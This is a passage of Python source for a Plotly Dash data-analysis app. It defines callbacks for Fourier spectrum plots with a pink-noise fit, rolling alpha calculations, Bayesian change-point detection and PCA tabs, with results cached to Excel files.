    [Output('FourierGraph', 'figure'),Output("FourierFourierDataSummary","children")],
    [Input('FourierData','children'), Input('FourierRangeSlider','value'), Input("FourierLinLog","value")],
    [State("FourierSigNum", "value")]
)
def update_graph(jsonified_data, value, LinLog, sig):
    '''
    Update Fourier graph
    Parameters:
        jsonified_data (json): Jsonified data
        value ([float,float]): Slider positions
        LinLog (str): "Linear" or "Log" scaling on power spectrum
        sig (float): Error scaling factor
    Returns:
        Fig (dcc.Graph) : Figure element
        JSON (json) : jsonified summary data for display
    '''
    if jsonified_data not in [0,"0", None, "None"]:
        startval = Misc.unixToDatetime(value[0])
        endval = Misc.unixToDatetime(value[1])
        #Un json data
        data = pd.read_json(jsonified_data, orient='split')
        #Remove Timezone info that read_json puts in
        data.index = data.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        # Statistics of interest
        WindowParameters = CalcStats.CalcStats(data[startval:endval][Data_i_Name])
        units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
        if units == None:
            return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcFourierStatsEmpty())
        # Transform the FULL series first - its spectrum fixes the y-axis limits
        # so the windowed spectrum below is drawn on a stable scale.
        fftfreq, AmpSpec, _ = Fourier.FourierTransform(data[Data_i_Name].values, units)
        if LinLog == 'Log':
            MinValue = min(AmpSpec[fftfreq > 0])/10
            MaxValue = max(AmpSpec[fftfreq > 0])*10
        if LinLog == 'Linear':
            MaxValue = max(AmpSpec[fftfreq > 0])*2
            MinValue = 0
        # NOTE(review): if LinLog is neither 'Log' nor 'Linear', MinValue and
        # MaxValue are never assigned and the CreateFFTFig call below raises -
        # confirm the radio item only supplies these two values.
        # Re-transform over the slider-highlighted window for the actual plot.
        fftfreq, AmpSpec, Series_phase = Fourier.FourierTransform(data[startval:endval][Data_i_Name].values, units)
        # Error estimated on mean deviation between points
        errs = Misc.errCalculation(data, WindowParameters["RateUnit"], True)
        # Fit the 1/f ("pink noise") model above the minimum frequency cut.
        PPink, PPinkErrs = Fourier.FitPink(fftfreq[fftfreq > Alpha_MinFreq], AmpSpec[fftfreq > Alpha_MinFreq], errs, units)
        FigAlpha = DashPlots.CreateFFTFig(fftfreq[fftfreq > 0], AmpSpec[fftfreq > 0],PPink, FigHeightPX/2,[MinValue, MaxValue], Alpha_MinFreq, LinLog, Data_i_Name)
        FourierStats = CalcStats.CalcFourierStats(fftfreq[fftfreq > 0], AmpSpec[fftfreq > 0],PPink, PPinkErrs)
        if SaveFigs == 1:
            # Render a matplotlib copy to disk in a separate process; vertical
            # lines mark yearly harmonics.
            NameDate = "_%s_%s" % (data.index[0].strftime("%d%m%Y"),data.index[-1].strftime("%d%m%Y"))
            LinesVert=[365,365*2,365*3,365*4,365*5,365*6,365*7,365*8,365*9,365*10,365*11,365*12]
            if LinLog == "Linear":
                YScale = 'linear'
            if LinLog == "Log":
                YScale = 'log'
            XRange = [fftfreq[fftfreq > 0][0]/2, fftfreq[fftfreq > 0][-1]*2]
            XModel = np.logspace(np.log10(XRange[0]), np.log10(XRange[1]), 1000)
            YModel = Fourier.modelPink(XModel, PPink[0], PPink[1])
            YRange = [min(min(YModel),min(AmpSpec[fftfreq > 0])), max(max(YModel),max(AmpSpec[fftfreq > 0]))]
            p1 = Process(target=Graphing.plotMATPLOTLIB, args=[[fftfreq[fftfreq > Alpha_MinFreq],XModel],[AmpSpec[fftfreq > Alpha_MinFreq],YModel], [None,None],XRange,YRange,"log", YScale,LinesVert, [], "frequency, f [1/year]", "Amplitude, A", ["Data","Model"], ["black", "red"],["-", "--"],"cachefiles"+os.sep+"Fourier",Data_i_Name+NameDate,False])
            p1.start()
            p1.join()
        return FigAlpha, json.dumps(FourierStats)
    else:
        return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcFourierStatsEmpty())
#######################
# Summary Stats
#######################
@app.callback(
    Output('FourierTable', 'children'),
    [Input("FourierDataSummary","children"),Input("FourierFourierDataSummary","children")]
)
def update_graph(Parameters, FourierStats):
    '''
    Load parameters into the summary column.
    Parameters:
        Parameters (json): Parameters summarising Raw data
        FourierStats (json): Parameters summarising Fourier data
    Returns:
        Dict (dict): Parameters summarising Raw data
    '''
    # Decode both JSON stores and hand them to the layout builder.
    return build_fourierdatasummary(json.loads(Parameters), json.loads(FourierStats))
################################################################################################################
# Callbacks Tab 3:
################################################################################################################
#######################
# Dropdowns
#######################
@app.callback(
    [Output('AlphasColName-dropdown','options'),Output('AlphasColName-dropdown','value')],
    [Input('AlphasStrSearch', "value")],
    [State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
    '''
    Update options for dropdown element for variables in Raw graphs
    Parameters:
        StrSearch (float): Key substring to index files by
        RawDir (float): Files directory
    Returns:
        Dropdowns (options): List of possible dropdowns
        Value (value): Initial selected value
    '''
    # Remember the latest search string for newly-built tabs.
    global DefaultFeature
    DefaultFeature = StrSearch
    available = DatM.GlobDirectory(RawDir)
    matches = Misc.PatternsList(StrSearch, available)
    if matches:
        # Single-select dropdown: pre-select the first match only.
        selected, initial = matches, matches[0]
    else:
        selected, initial = available, None
    return [{'label':"Variable: %s" % (name), 'value':name} for name in selected], initial
#######################
# Load data
#######################
# Load the selected feature's raw data via the shared LoadDataAfterDropdowns helper.
app.callback(
    Output('AlphasRawData', 'children'),
    [Input('RawDirect','children'), Input('AlphasColName-dropdown', 'value')]
)(LoadDataAfterDropdowns)
@app.callback(
[Output('AlphasData', 'children'),Output("Spinner-tab3-B","children")],
[Input('AlphasRun','n_clicks')],
[State('AlphasRawData','children'), State('RawDirect','children'), State('AlphasDirect','children')])
def LoadAlphasData(n_clicks,jsonified_data, RawDir, AlphaDir):
    '''
    Generate Alpha data
    Parameters:
        n_clicks (int): A decimal integer
        jsonified_data (json): Jsonified data
        RawDir (float): Files directory
        AlphaDir (float): Files directory
    Returns:
        AlphaData (json): Jsonified data of alphas
        spinner (dcc.spinner): spinner object
    '''
    if jsonified_data not in [0,"0", None, "None"] and n_clicks not in [None]:
        #Un json data
        data = pd.read_json(jsonified_data, orient='split')
        #Remove Timezone info that read_json puts in
        data.index = data.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        # Statistics of interest
        WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
        units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
        window = Misc.WindowSize(WindowParameters["Rate"], WindowParameters["RateUnit"], WindowUnit, WindowN)
        # Reuse a previously computed result when one exists on disk.
        FileExists = DatM.CheckExists(RawDir, AlphaDir, Data_i_Name)
        if FileExists == True:
            Alphasdf = DatM.LoadData(AlphaDir, Data_i_Name)
        else:
            # Error estimated on mean deviation between points
            errs = Misc.errCalculation(data, WindowParameters["RateUnit"], True)
            Alphasdf = Fourier.AlphasProgress(data[Data_i_Name].values, window, errs, units, Data_i_Name)
            Alphasdf.index = data.index
            # Context manager saves and closes the workbook on exit.
            # BUG FIX: the explicit writer.save() call used previously was
            # deprecated and removed in pandas 2.0; `with` works on all versions.
            with pd.ExcelWriter("%s%s%s.xlsx" % (AlphaDir, os.sep, Data_i_Name), mode="w") as writer:
                Alphasdf.to_excel(writer)
        return Alphasdf.to_json(date_format='iso', orient='split'), ""
    else:
        return "0", ""
#######################
# RPlots
#######################
@app.callback(
    [Output('AlphasRawGraph', 'figure'),Output("AlphasDataSummary","children"),Output("AlphasProcess-Header", "children")],
    [Input('AlphasRawData','children'), Input('AlphasGraph', 'clickData'), Input("AlphasSigNum", "value")]
)
def update_graph(jsonified_data, clickData, sig):
    '''
    Update Alpha Raw graph
    Parameters:
        jsonified_data (json): Jsonified data
        clickData (dict): Click Data
        sig (float): Error scaling factor
    Returns:
        Fig (dcc.Graph) : Figure element
        JSON (json) : jsonified summary data for display
        Header (str): Header above progress bar
    '''
    if jsonified_data not in [0,"0", None, "None"]:
        #Un json data
        data = pd.read_json(jsonified_data, orient='split')
        #Remove Timezone info that read_json puts in
        data.index = data.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
        # One rolling-window's worth of time; the highlighted region ends at the
        # clicked point and extends one window back.
        f = Misc.timedeltaOneUnit(WindowN, WindowUnit)
        if clickData == None:
            # No click yet: highlight the most recent window.
            endval = data.index[-1]
            startval = endval - f
        elif clickData["points"][0]["pointIndex"] > len(data.index):
            # Click refers to a point outside the current series (stale click
            # after a data change): fall back to the most recent window.
            endval = data.index[-1]
            startval = endval - f
        else:
            endval = Misc.getDateTimeFromString(clickData["points"][0]["x"])
            startval = endval - f
            if endval > data.index[-1] or startval < data.index[0]:
                #CatchRefresh errors
                endval = data.index[-1]
                startval = endval - f
        # Statistics of interest
        WindowParameters = CalcStats.CalcStats(data[startval:endval][Data_i_Name])
        FigRaw = DashPlots.CreateRawFig(data, sig, Data_i_Name, WindowParameters, FigHeightPX/2)
        return FigRaw, json.dumps(WindowParameters), "Run all:"
    else:
        return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcStatsEmpty()), "Run all:"
@app.callback(
    [Output('AlphasGraph', 'figure'),Output("AlphasAlphasDataSummary","children")],
    [Input('AlphasData','children')],
    [State('AlphasRawData','children'), State('AlphasDirect','children'), State("AlphasSigNum","value")],
)
def update_graph(jsonified_dataAlphas, jsonified_data, AlphaDir, sig):
    '''
    Update Alpha Raw graph
    Parameters:
        jsonified_dataAlphas (json): Jsonified Alpha data
        jsonified_data (json): Jsonified data
        AlphaDir (str): Alpha data directory
        sig (float): Error scaling factor
    Returns:
        Fig (dcc.Graph) : Figure element
        JSON (json) : jsonified summary data for display
    '''
    # Both the raw series and the computed alpha series must be present.
    if jsonified_data not in [0,"0", None, "None"] and jsonified_dataAlphas not in [0,"0", None, "None"]:
        #Un json data
        data = pd.read_json(jsonified_data, orient='split')
        data.index = data.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        # Statistics of interest
        WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
        Alphasdf = pd.read_json(jsonified_dataAlphas, orient='split')
        # Remove timezone info that read_json puts in.
        Alphasdf.index = Alphasdf.index.tz_localize(None)
        Fig = DashPlots.CreateAlphasFig(Alphasdf, WindowParameters, sig, FigHeightPX/2, Data_i_Name)
        if SaveFigs == 1:
            # Render a matplotlib copy to disk in a separate process.
            XRange = [data.index[0],data.index[-1]]
            NameDate = "_%s_%s" % (XRange[0].strftime("%d%m%Y"),XRange[1].strftime("%d%m%Y"))
            p1 = Process(target=Graphing.plotMATPLOTLIBAlpha, args=[data,Alphasdf,XRange,[None,None],"cachefiles"+os.sep+"Alpha",Data_i_Name+NameDate,True])
            p1.start()
            p1.join()
        return Fig, json.dumps(CalcStats.CalcAlphaStats(Alphasdf[Data_i_Name]))
    else:
        return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcAlphaStatsEmpty())
#######################
# Run all alphas
#######################
@app.callback(
[Output("AlphasProcess-Button","children"),Output("Spinner-tab3-A", "children")],
[Input('AlphasProcess-Button','n_clicks')],
[State('AlphasProcess-Button','children') ,State('RawDirect','children'),State('AlphasDirect','children')],
)
def update_graph(NClicks,ButtonState, RawDir, AlphaDir):
    '''
    Run all alpha anaylsis
    Parameters:
        NClicks (dict): Clickdata
        ButtonState (str): Button text
        RawDir (str): Raw data directory
        AlphaDir (str): Alpha data directory
    Returns:
        ButtonStr (str) : Button text
        Spinner (dcc.spinner) : spinner object to display while loading
    '''
    if NClicks not in [0, "0", None, "None"]:
        Files = DatM.GlobDirectory(RawDir)
        for Data_i_Name in Files:
            print(Data_i_Name)
            # Skip features whose alpha series already exists on disk.
            AlphaFileExists = DatM.CheckExists(RawDir, AlphaDir, Data_i_Name)
            if AlphaFileExists == True:
                continue
            data = DatM.LoadData(RawDir, Data_i_Name)
            # Statistics of interest
            WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
            units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
            window = Misc.WindowSize(WindowParameters["Rate"], WindowParameters["RateUnit"], WindowUnit, WindowN)
            # Error estimated on mean deviation between points
            errs = Misc.errCalculation(data, WindowParameters["RateUnit"], True)
            Alphasdf = Fourier.AlphasProgress(data[Data_i_Name].values, window, errs, units, Data_i_Name)
            Alphasdf.index = data.index
            # Context manager saves and closes the workbook on exit.
            # BUG FIX: the explicit writer.save() call used previously was
            # deprecated and removed in pandas 2.0; `with` works on all versions.
            with pd.ExcelWriter("%s%s%s.xlsx" % (AlphaDir, os.sep, Data_i_Name), mode="w") as writer:
                Alphasdf.to_excel(writer)
        return "Done", ""
    else:
        return ButtonState, ""
#######################
# Summary stats
#######################
@app.callback(
    Output('AlphasTable', 'children'),
    [Input("AlphasDataSummary","children"),Input("AlphasAlphasDataSummary","children")]
)
def update_graph(Parameters, AlphaStats):
    '''
    Load parameters into the summary column.
    Parameters:
        Parameters (json): Parameters summarising Raw data
        AlphaStats (json): Parameters summarising Alpha data
    Returns:
        Dict (dict): Parameters summarising Raw data
    '''
    # Decode both JSON stores and hand them to the layout builder.
    return build_Alphasdatasummary(json.loads(Parameters), json.loads(AlphaStats))
#######################
# Progress
#######################
@app.callback(
    [Output("AlphasProcess-Progress", "children"), Output("AlphasProcess-Progress", "value")],
    [Input("intervalMid", "n_intervals")],
    [State('RawDirect', 'children'), State('AlphasDirect', 'children')]
)
def update_graph(n_intervals, RawDir, AlphaDir):
    '''
    Refresh the alpha-processing progress bar on each timer tick.

    Parameters:
        n_intervals (int): Interval pulse counter
        RawDir (str): Raw data directory
        AlphaDir (str): Alpha data directory
    Returns:
        Percent (str): Percentage completion label
        value (float): Percentage completion
    '''
    completed_fraction = DatM.CheckLog(RawDir, AlphaDir)
    Percentage = Misc.round_sig(completed_fraction, 2)
    label = "%s" % (Percentage) + "\u0025"
    return label, Percentage
################################################################################################################
# Callbacks Tab 4:
################################################################################################################
#######################
# Dropdowns
#######################
#Update options for dropdown element for variables in Raw graphs
@app.callback(
    [Output('BOCPDColName-dropdown', 'options'), Output('BOCPDColName-dropdown', 'value')],
    [Input('BOCPDStrSearch', "value")],
    [State('RawDirect', 'children')],
)
def update_dropdowns(StrSearch, RawDir):
    '''
    Update options for the variable dropdown on the BOCPD tab.

    Parameters:
        StrSearch (str): Key substring to index files by
        RawDir (str): Files directory
    Returns:
        Dropdowns (options): List of possible dropdowns
        Value (value): Initial selected value
    '''
    global DefaultFeature
    DefaultFeature = StrSearch
    all_files = DatM.GlobDirectory(RawDir)
    matches = Misc.PatternsList(StrSearch, all_files)
    if matches:
        initial = matches[0]
    else:
        # No match: offer every file but leave the selection empty.
        matches = all_files
        initial = None
    options = [{'label': "Variable: %s" % (name), 'value': name} for name in matches]
    return options, initial
#######################
# Load data
#######################
#Update RawAlphas data
# Register the shared LoadDataAfterDropdowns handler for tab 4's raw data.
# app.callback(...) returns a decorator which is applied directly to the
# existing function instead of using the usual @app.callback syntax.
app.callback(
    Output('BOCPDRawData', 'children'),
    [Input('RawDirect', 'children'), Input('BOCPDColName-dropdown', 'value')]
)(LoadDataAfterDropdowns)
#Update BOCPD data
@app.callback(
    [Output('BOCPDData', 'children'), Output("Spinner-tab4-A", "children")],
    [Input("BOCPDRun", "n_clicks")],
    [State('BOCPDRawData', 'children'), State("BOCPDDirect", "children"), State("RawDirect", "children")],
)
def LoadAlphasData(n_clicks, jsonified_data, BOCPDDirectory, RawDir):
    '''
    Run (or load a cached copy of) the BOCPD change-point analysis for the
    currently selected series and return it jsonified.

    Parameters:
        n_clicks (int): Number of clicks on the run button
        jsonified_data (json): Jsonified raw data
        BOCPDDirectory (str): BOCPD results directory
        RawDir (str): Raw data directory
    Returns:
        JSON (json): jsonified BOCPD data ("0" when there is nothing to do)
        spinner (str): Spinner placeholder content
    '''
    if jsonified_data not in ["0", 0, None, "None"] and n_clicks not in [None]:
        # Un json data
        data = pd.read_json(jsonified_data, orient='split')
        # Remove Timezone info that read_json puts in
        data.index = data.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        # Statistics of interest
        WindowParameters = CalcStats.CalcStats(data[Data_i_Name].dropna())
        # NOTE(review): `units` is computed but never used below — confirm
        # whether it can be removed.
        units = Misc.CalcUnits(WindowParameters["Rate"], WindowParameters["RateUnit"])
        FileExists = DatM.CheckExists(RawDir, BOCPDDirectory, Data_i_Name)
        if FileExists == True:
            # Reuse the spreadsheet produced by an earlier run.
            BOCPDdf = DatM.LoadData(BOCPDDirectory, Data_i_Name)
        else:
            # Error estimated on mean deviation between points; neighbouring
            # errors are combined in quadrature for the differenced series.
            errs = Misc.errCalculation(data, WindowParameters["RateUnit"], False)
            errs = np.sqrt(errs[1:]**2 + errs[:-1]**2)
            # BOCPD runs on the first-differenced series, hence index[1:].
            BOCPDdf, R_Max, Ps = BOCPD.bocd(data[Data_i_Name].diff(1).values[1:], BOCPD_errsScale*errs)
            BOCPDdf = pd.DataFrame(BOCPDdf[:, :], index=data.index[1:])
            writer = pd.ExcelWriter("%s%s%s.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w")
            BOCPDdf.to_excel(writer)
            writer.save()
            # R_Max/Ps only exist in this branch, so the run-length summary
            # workbook must be written here as well.
            Rmaxdf = pd.DataFrame(data={"R_Max": R_Max, "P": Ps}, index=data.index[1:])
            writer = pd.ExcelWriter("%s%s%s_R_Max.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w")
            Rmaxdf.to_excel(writer)
            writer.save()
        return BOCPDdf.to_json(date_format='iso', orient='split'), ""
    else:
        return "0", ""
#######################
# Raw Plots
#######################
#Update Alpha graphs selected
@app.callback(
    [Output('BOCPDRawGraph', 'figure'), Output("BOCPDDataSummary", "children")],
    [Input('BOCPDRawData', 'children'), Input('BOCPDGraph', 'clickData')],
)
def update_graph(jsonified_data, clickData):
    '''
    Update the raw-data graph on the BOCPD tab, optionally zoomed to the
    run-length segment the user clicked in the BOCPD heat map.

    Parameters:
        jsonified_data (json): Jsonified data
        clickData (dict): Click data from the BOCPD graph
    Returns:
        Fig (dcc.Graph): Figure element
        JSON (json): jsonified summary data for display
    '''
    if jsonified_data in ["0", 0, None, "None"]:
        return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcStatsEmpty())
    # Un-json the data and strip the timezone read_json adds.
    data = pd.read_json(jsonified_data, orient='split')
    data.index = data.index.tz_localize(None)
    Data_i_Name = data.columns[0]
    WindowParameters = CalcStats.CalcStats(data[Data_i_Name].dropna())
    first, last = data.index[0], data.index[-1]
    if clickData is None:
        startval, endval = first, last
    else:
        # Translate the clicked run length into a [start, end] time window.
        step = Misc.timedeltaOneUnit(WindowParameters["Rate"], WindowParameters["RateUnit"])
        seqlen = int(clickData["points"][0]["y"])
        endval = Misc.getDateTimeFromString(clickData["points"][0]["x"]) + step
        startval = endval - seqlen * step
        if startval < first or endval > last:
            # Clicked window falls outside the data: show everything.
            startval, endval = first, last
    # Recompute the summary statistics over the displayed window only.
    WindowParameters = CalcStats.CalcStats(data[Data_i_Name][startval:endval].dropna())
    Fig = DashPlots.CreateRawFig(data, BOCPD_errsScale, Data_i_Name, WindowParameters, FigHeightPX/2)
    return Fig, json.dumps(WindowParameters)
#Update Alpha graphs selected
@app.callback(
    [Output('BOCPDGraph', 'figure'), Output("BOCPDBOCPDDataSummary", "children")],
    [Input('BOCPDData', 'children')],
    [State('BOCPDRawData', 'children')]
)
def update_graph(jsonified_dataBOCPD, jsonified_data):
    '''
    Update the BOCPD run-length graph and its summary statistics.

    Parameters:
        jsonified_dataBOCPD (json): Jsonified BOCPD data
        jsonified_data (json): Jsonified raw data
    Returns:
        Fig (dcc.Graph): Figure element
        JSON (json): jsonified summary data for display
    '''
    if jsonified_dataBOCPD not in ["0", 0, None, "None"] and jsonified_data not in ["0", 0, None, "None"]:
        # Un json data; drop the timezone read_json adds.
        data = pd.read_json(jsonified_data, orient='split')
        data.index = data.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        # Statistics of interest
        WindowParameters = CalcStats.CalcStats(data[Data_i_Name].dropna())
        WindowParameters["Start"] = Misc.unixTimeMillis(data.index[0])
        WindowParameters["End"] = Misc.unixTimeMillis(data.index[-1])
        BOCPDdf = pd.read_json(jsonified_dataBOCPD, orient='split')
        BOCPDdf.index = BOCPDdf.index.tz_localize(None)
        # Most likely run length at each step; run length 0 marks a change point.
        R_Max = np.argmax(BOCPDdf.values, axis=1)
        Lines = BOCPDdf.index[np.argwhere(R_Max == 0).reshape(-1)]
        if len(Lines) > 20:
            # Too many change points clutter the plot: draw none instead.
            Lines = []
        # Both previous branches built this identical figure; collapsed into
        # a single call.
        Fig = DashPlots.CreateBOCPDFig(BOCPDdf, R_Max, Lines, WindowParameters, BOCPD_tol, FigHeightPX/2)
        Stats = CalcStats.CalcBOCPDStats(R_Max, BOCPD_tol)
        if SaveFigs == 1:
            # Export a matplotlib copy in a separate process.
            Name = Data_i_Name
            NameDate = "_%s_%s" % (BOCPDdf.index[0].strftime("%d%m%Y"), BOCPDdf.index[-1].strftime("%d%m%Y"))
            p1 = Process(target=Graphing.plotMATPLOTLIBBOCPDHeat, args=[BOCPDdf.index, data[Data_i_Name].dropna().values[1:], data["Error"].dropna().values[1:], R_Max, BOCPDdf.values, BOCPD_tol, Misc.timedeltaOneUnit(WindowParameters["Rate"], WindowParameters["RateUnit"]), [BOCPDdf.index[0], BOCPDdf.index[-1]], [0, int(max(R_Max)*1.2)], Lines, "Time, t", Data_i_Name, "cachefiles"+os.sep+"BOCPD", Name+NameDate, True])
            p1.start()
            p1.join()
        return Fig, json.dumps(Stats)
    else:
        return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcBOCPDStatsEmpty())
#######################
# Summary stats
#######################
@app.callback(
    Output('BOCPDTable', 'children'),
    [Input("BOCPDDataSummary", "children"), Input("BOCPDBOCPDDataSummary", "children")]
)
def update_graph(Parameters, BOCPDStats):
    '''
    Fill the BOCPD summary column from the two jsonified stat blobs.

    Parameters:
        Parameters (json): Parameters summarising the raw data
        BOCPDStats (json): Parameters summarising the BOCPD data
    Returns:
        Dict (dict): Summary table children
    '''
    raw_summary = json.loads(Parameters)
    bocpd_summary = json.loads(BOCPDStats)
    return build_BOCPDdatasummary(raw_summary, bocpd_summary)
#######################
# Progress
#######################
#Callback to update processbar
#Callback to update processbar
@app.callback(
    [Output("BOCPDProcess-Progress", "children"), Output("BOCPDProcess-Progress", "value")],
    [Input("intervalMid", "n_intervals")],
    [State("RawDirect", "children"), State('BOCPDDirect', 'children')]
)
def update_graph(n_intervals, RawDir, BOCPDDirectory):
    '''
    Refresh the BOCPD-processing progress bar on each timer tick.

    Parameters:
        n_intervals (int): Interval pulse counter
        RawDir (str): Raw data directory
        BOCPDDirectory (str): BOCPD data directory
    Returns:
        Percent (str): Percentage completion label
        value (float): Percentage completion
    '''
    completed_fraction = DatM.CheckLog(RawDir, BOCPDDirectory)
    Percentage = Misc.round_sig(completed_fraction, 2)
    label = "%s" % (Percentage) + "\u0025"
    return label, Percentage
#######################
# Run all BOCPD
#######################
#Run all when button pushed.
#Run all when button pushed.
@app.callback(
    [Output("BOCPDProcess-Button", "children"), Output("Spinner-tab4-B", "children")],
    [Input('BOCPDProcess-Button', 'n_clicks')],
    [State('BOCPDProcess-Button', 'children'), State('RawDirect', 'children'), State('BOCPDDirect', 'children')],
)
def update_graph(NClicks, ButtonState, RawDir, BOCPDDirectory):
    '''
    Run the BOCPD analysis for every raw data file that does not yet have
    results in BOCPDDirectory.

    Parameters:
        NClicks (int): Click counter (None/0 before the first click)
        ButtonState (str): Current button text
        RawDir (str): Raw data directory
        BOCPDDirectory (str): BOCPD data directory
    Returns:
        ButtonStr (str): Button text ("Done" after a run)
        Spinner (str): Spinner placeholder content
    '''
    # Guard clause: nothing to do until the button has actually been pressed.
    if NClicks in [0, "0", None, "None"]:
        return ButtonState, ""
    for Data_i_Name in DatM.GlobDirectory(RawDir):
        # Skip series that were already processed on an earlier run.
        if DatM.CheckExists(RawDir, BOCPDDirectory, Data_i_Name):
            continue
        # Run analysis
        data = DatM.LoadData(RawDir, Data_i_Name)
        WindowParameters = CalcStats.CalcStats(data)
        # Error estimated on mean deviation between points; neighbouring
        # errors combined in quadrature for the differenced series.
        errs = Misc.errCalculation(data, WindowParameters["RateUnit"], False)
        errs = np.sqrt(errs[1:]**2 + errs[:-1]**2)
        BOCPDdf, R_Max, Ps = BOCPD.bocd(data[Data_i_Name].diff(1).values[1:], BOCPD_errsScale*errs)
        BOCPDdf = pd.DataFrame(BOCPDdf[:, :], index=data.index[1:])
        # Context managers close each workbook even on error; the previous
        # explicit writer.save() is deprecated/removed in recent pandas.
        with pd.ExcelWriter("%s%s%s.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w") as writer:
            BOCPDdf.to_excel(writer)
        Rmaxdf = pd.DataFrame(data={"R_Max": R_Max, "P": Ps}, index=data.index[1:])
        with pd.ExcelWriter("%s%s%s_R_Max.xlsx" % (BOCPDDirectory, os.sep, Data_i_Name), mode="w") as writer:
            Rmaxdf.to_excel(writer)
    return "Done", ""
################################################################################################################
# Callbacks Tab 5:
################################################################################################################
#######################
# Dropdowns
#######################
#Update options for dropdown element for variables in PCA graphs
#Update options for dropdown element for variables in PCA graphs
@app.callback(
    [Output('PCAColName-dropdown', 'options'), Output('PCAColName-dropdown', 'value')],
    [Input('PCAStrSearch', "value"), Input('PCATypeSelect', 'value')],
)
def update_dropdowns(StrSearch, Type):
    '''
    Update options for the variable dropdown on the PCA tab.

    Parameters:
        StrSearch (str): Key substring to index files by
        Type (str): "Alpha", "Raw" or "BOCPD" — selects the data directory
    Returns:
        Dropdowns (options): List of possible dropdowns (all files)
        Value (value): Initially selected values (files matching StrSearch)
    '''
    # Map the data type to its directory; previously an unknown Type left
    # `Dir` unbound and raised NameError further down.
    type_dirs = {
        "Alpha": "data" + os.sep + "AlphaData",
        "Raw": "data" + os.sep + "RawData",
        "BOCPD": "data" + os.sep + "BOCPDData",
    }
    if Type not in type_dirs:
        return [], []
    Files = DatM.GlobDirectory(type_dirs[Type])
    KeySelected = Misc.PatternsList(StrSearch, Files)
    if Type == "BOCPD":
        # Only the run-length summaries are meaningful for PCA on BOCPD data.
        KeySelected = Misc.PatternsList("R_Max", KeySelected)
    global DefaultFeature
    DefaultFeature = StrSearch
    global DefaultDataType
    DefaultDataType = Type
    return [{'label': "Variable: %s" % (name), 'value': name} for name in Files], KeySelected
@app.callback(
    [Output('PCATestFeature-dropdown', 'options'), Output('PCATestFeature-dropdown', 'value')],
    [Input('PCAStrSearch', "value"), Input('PCATypeSelect', 'value')],
)
def update(StrSearch, Type):
    '''
    Update options for the marginal-feature dropdown on the PCA tab.

    Parameters:
        StrSearch (str): Search string
        Type (str): "Alpha", "Raw" or "BOCPD" — selects the data directory
    Returns:
        Dropdowns (options): List of possible dropdowns
        Value (value): Initial selected value (always None)
    '''
    # Map the data type to its directory; previously an unknown Type left
    # `Dir` unbound and raised NameError further down.
    type_dirs = {
        "Alpha": "data" + os.sep + "AlphaData",
        "Raw": "data" + os.sep + "RawData",
        "BOCPD": "data" + os.sep + "BOCPDData",
    }
    if Type not in type_dirs:
        return [], None
    Files = DatM.GlobDirectory(type_dirs[Type])
    KeySelected = Misc.PatternsList(StrSearch, Files)
    if Type == "BOCPD":
        # Only the run-length summaries are meaningful for PCA on BOCPD data.
        KeySelected = Misc.PatternsList("R_Max", KeySelected)
    return [{'label': "Variable: %s" % (name), 'value': name} for name in KeySelected], None
#######################
# RunPCA
#######################
@app.callback(
    [Output('PCARun', 'children'), Output("PCAData", "children"), Output("PCATsData", "children"), Output("PCAQsData", "children"), Output("DataSummary", "children"), Output("PCADataSummary", "children"), Output("Spinner-tab5-A", "children")],
    [Input('PCARun', 'n_clicks')],
    [State('PCATypeSelect', 'value'), State('PCAColName-dropdown', 'value'), State('PCAStrSearch', "value")]
)
def update_graph(nclicks, Type, Vars, StringSearch):
    '''
    Run the PCA analysis over the selected features.

    Parameters:
        nclicks (int): Number of times the run button has been clicked
        Type (str): "Alpha" "Raw" "BOCPD"
        Vars (list): List of features
        StringSearch (str): Search string
    Returns:
        PCARun (str): Button text
        PCAData (json): jsonified PCA data
        PCATsData (json): jsonified Ts data
        PCAQsData (json): jsonified Q data
        Dict (json): Parameters summarising raw data
        Dict (json): Parameters summarising PCA data
        spinner (str): Spinner placeholder content
    '''
    def _empty():
        # Single definition of the "nothing to show" response that was
        # previously duplicated at every early exit.
        return "Run", "", "", "", json.dumps(CalcStats.CalcStatsEmpty()), json.dumps(CalcStats.CalcPCAStatsEmpty()), ""
    if Type == "Alpha":
        Dir = "data" + os.sep + "AlphaData"
    if Type == "Raw":
        Dir = "data" + os.sep + "RawData"
    if Type == "BOCPD":
        Dir = "data" + os.sep + "BOCPDData"
    if nclicks in [None]:
        return _empty()
    PCA_NPCA, PCA_AlphaLim, _ = Misc.GetOptimzed(PCA_FittedParams, Type, StringSearch, DefaultMetric, Vars)
    # Get crashing cases out of the way.
    if Vars in [None, "None"]:  # No features selected
        return _empty()
    elif PCA_NPCA > len(Vars):  # More PCA components than dimensions
        return _empty()
    else:
        TestCol = Vars[0]
        # Load all selected series into one large DataFrame.
        df, _ = DatM.PCALOAD(Dir, Vars)
        if df.empty:  # Checks to make sure sensible to plot
            return _empty()
        WindowParameters = CalcStats.CalcStats(df.iloc[:, 0])
        window = Misc.WindowSize(WindowParameters["Rate"], WindowParameters["RateUnit"], PCA_WindowUnit, PCA_WindowN)
        dtMeasure = Misc.timedeltaOneUnit(WindowParameters["Rate"], WindowParameters["RateUnit"])
        if df.shape[0] < window:
            # Not enough samples to fill a single rolling window.
            return _empty()
